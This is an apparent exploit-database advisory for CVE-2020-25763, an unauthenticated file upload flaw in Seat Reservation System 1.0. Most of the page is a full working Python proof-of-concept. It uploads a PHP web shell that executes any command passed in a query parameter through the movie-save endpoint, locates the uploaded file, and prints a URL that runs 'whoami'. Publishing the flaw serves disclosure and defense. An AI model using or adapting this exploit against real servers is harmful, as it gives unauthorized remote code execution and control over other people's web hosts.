Seat Reservation System 1.0 Shell Upload

2020.09.23
Credit: Rahul Ramkumar
Risk: High
Local: No
Remote: Yes
CVE: CVE-2020-25763
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Seat Reservation System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading PHP files. Vendor Homepage: www.sourcecodester.com Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip Author: Rahul Ramkumar Date: 2020-09-16 CVE: CVE-2020-25763 PoC: ------- # Exploit Title: Seat Reservation System 1.0 - Unauthenticated Remote Code Execution import requests, sys, urllib, re from lxml import etree from io import StringIO from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) import random import string def print_usage(STRING): return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET if __name__ == "__main__": if len(sys.argv) != 2: print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0]) print print_usage("Example:\t python %s ' https://192.168.1.72:443/seat_reservation/'" % sys.argv[0]) sys.exit(-1) SERVER_URL = sys.argv[1] UPLOAD_DIR = 'admin/ajax.php?action=save_movie' UPLOAD_URL = SERVER_URL + UPLOAD_DIR random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(16)]) webshell = random+'.php' s = requests.Session() s.get(SERVER_URL, verify=False) image = { 'cover': ( webshell, '<?php echo shell_exec($_GET["d3crypt"]); ?>', 'application/php', {'Content-Disposition': 'form-data'} ) } fdata = {'id': '','title':'Shelling','description':'','duration_hour':'3','duration_min':'0','date_showing':'2020-01-01','end_date':'2040-09-25'} r1 = s.post(url=UPLOAD_URL, files=image, data=fdata, verify=False) r2 = s.get(SERVER_URL, verify=False) response_page = r2.content.decode("utf-8") parser = etree.HTMLParser() tree = etree.parse(StringIO(response_page), parser=parser) def get_links(tree): refs = tree.xpath("//img") links = [link.get('src', '') for link in refs] return [l for l in links] links = get_links(tree) print('Access your webshell at: ') for link in links: if webshell in link: print(SERVER_URL + link+'?d3crypt=whoami')


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top